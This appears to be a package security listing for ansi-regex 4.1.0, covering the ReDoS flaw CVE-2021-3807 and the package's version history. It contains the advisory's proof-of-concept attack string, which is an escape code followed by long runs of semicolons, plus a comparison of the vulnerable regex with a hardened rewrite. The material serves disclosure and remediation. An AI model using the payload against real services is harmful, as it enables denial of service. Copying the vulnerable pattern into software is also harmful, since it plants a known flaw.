NodeJS/ansi-regex/4.1.0
Regular expression for matching ANSI escape codes
https://www.npmjs.com/package/ansi-regex
MIT
1 Security Vulnerabilities
Inefficient Regular Expression Complexity in chalk/ansi-regex
- https://nvd.nist.gov/vuln/detail/CVE-2021-3807
- https://github.com/advisories/GHSA-93q8-gq69-wqmw
- https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9
- https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994
- https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311
- https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908
- https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774
- https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20221014-0002/
- https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1
- https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a
- https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8
ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
Proof of Concept

```js
// Proof of concept from the advisory: feed ansi-regex 4.1.0 a truncated CSI
// sequence (ESC '[') followed by a growing run of ';' and time each test() call.
import ansiRegex from 'ansi-regex';

for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // ESC '[' then i*10000 semicolons: never a complete escape code, so the
  // match fails only after the engine has backtracked through the ambiguous
  // sub-patterns for every possible split of the ';' run.
  var attack_str = "\u001B[" + ";".repeat(i * 10000);
  ansiRegex().test(attack_str);
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
```
The ReDoS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`.
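As an added example that is not code from the advisory or from the ansi-regex project: the block below rebuilds the 4.1.0 pattern around the two sub-patterns quoted above, places a hardened rewrite next to it (constructed here in the spirit of the linked fix commit, not a verbatim copy of it), and times both on the advisory's input shape. `VULNERABLE_PATTERN`, `HARDENED_PATTERN`, `attackString`, `timedTest`, `bothMatch` and `stripAnsi` are names chosen for this example.

```javascript
// Added example (not ansi-regex's own code). VULNERABLE_PATTERN reconstructs the
// 4.1.0 regex around the two sub-patterns named in the advisory; HARDENED_PATTERN
// is a constructed rewrite in the spirit of the linked fix, not a verbatim copy.
const VULNERABLE_PATTERN = [
  '[\\u001B\\u009B][[\\]()#;?]*(?:(?:(?:[a-zA-Z\\d]*(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*)?\\u0007)',
  '(?:(?:\\d{1,4}(?:;\\d{0,4})*)?[\\dA-PR-TZcf-ntqry=><~]))',
].join('|');

// Why the original is quadratic: [[\]()#;?]* also consumes ';', so a run of n ';'
// can be split between it and (?:;[...]*)* in n ways, and each split is unwound
// one ';' at a time when the required \u0007 never arrives.
// The rewrite requires a non-empty parameter after each ';' ([...]+) or a
// non-empty [a-zA-Z\d]+ run before the loop, so every retry fails in O(1).
const HARDENED_PATTERN = [
  '[\\u001B\\u009B][[\\]()#;?]*(?:(?:(?:(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]+)*|[a-zA-Z\\d]+(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*)?\\u0007)',
  '(?:(?:\\d{1,4}(?:;\\d{0,4})*)?[\\dA-PR-TZcf-ntqry=><~]))',
].join('|');

function makeRegex(pattern, onlyFirst = false) {
  return new RegExp(pattern, onlyFirst ? undefined : 'g');
}

// Constructed worst-case input with the advisory's shape: ESC '[' then n ';'.
function attackString(n) {
  return '\u001B[' + ';'.repeat(n);
}

// One test() call: returns whether it matched and how long it took (ms).
function timedTest(pattern, input) {
  const re = makeRegex(pattern, true);
  const start = performance.now();
  const matched = re.test(input);
  return { matched, ms: performance.now() - start };
}

// Regression check: a hardened pattern must still match real escape sequences.
function bothMatch(input) {
  return makeRegex(VULNERABLE_PATTERN, true).test(input) &&
         makeRegex(HARDENED_PATTERN, true).test(input);
}

// Typical consumer use (strip-ansi style), defaulting to the hardened pattern.
function stripAnsi(input, pattern = HARDENED_PATTERN) {
  return input.replace(makeRegex(pattern), '');
}

for (const n of [1000, 2000, 4000]) {
  const v = timedTest(VULNERABLE_PATTERN, attackString(n));
  const h = timedTest(HARDENED_PATTERN, attackString(n));
  console.log(`n=${n}: vulnerable ${v.ms.toFixed(1)} ms, hardened ${h.ms.toFixed(2)} ms`);
}
```

Doubling n roughly quadruples the vulnerable timing while the hardened one stays flat; the same input never matches either pattern, so the only observable difference is the work spent rejecting it.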
17 Other Versions
Version | License | Security (advisories) | Released | Age
---|---|---|---|---
3.0.0 | MIT | 1 | 2017-06-20 - 19:03 | almost 7 years
5.0.0 | MIT | 1 | 2019-10-04 - 11:29 | over 4 years
6.0.0 | MIT | 1 | 2021-04-16 - 06:02 | about 3 years
4.0.0 | MIT | 1 | 2018-09-18 - 08:18 | over 5 years
4.1.0 | MIT | 1 | 2019-03-08 - 06:14 | about 5 years
1.1.1 | MIT | | 2015-02-22 - 09:24 | about 9 years
2.0.0 | MIT | | 2015-06-30 - 16:07 | almost 9 years
2.1.1 | MIT | | 2017-01-14 - 03:09 | over 7 years
1.0.0 | MIT | | 2014-08-13 - 13:29 | over 9 years
0.2.0 | MIT | | 2014-06-14 - 01:12 | almost 10 years
0.1.0 | MIT | | 2014-06-03 - 16:59 | almost 10 years
0.2.1 | MIT | | 2014-06-20 - 16:44 | almost 10 years
1.1.0 | MIT | | 2014-08-30 - 12:38 | over 9 years
6.0.1 | MIT | | 2021-09-10 - 20:25 | over 2 years
5.0.1 | MIT | | 2021-09-14 - 15:55 | over 2 years
4.1.1 | MIT | | 2022-03-12 - 03:08 | about 2 years
3.0.1 | MIT | | 2022-03-27 - 13:29 | about 2 years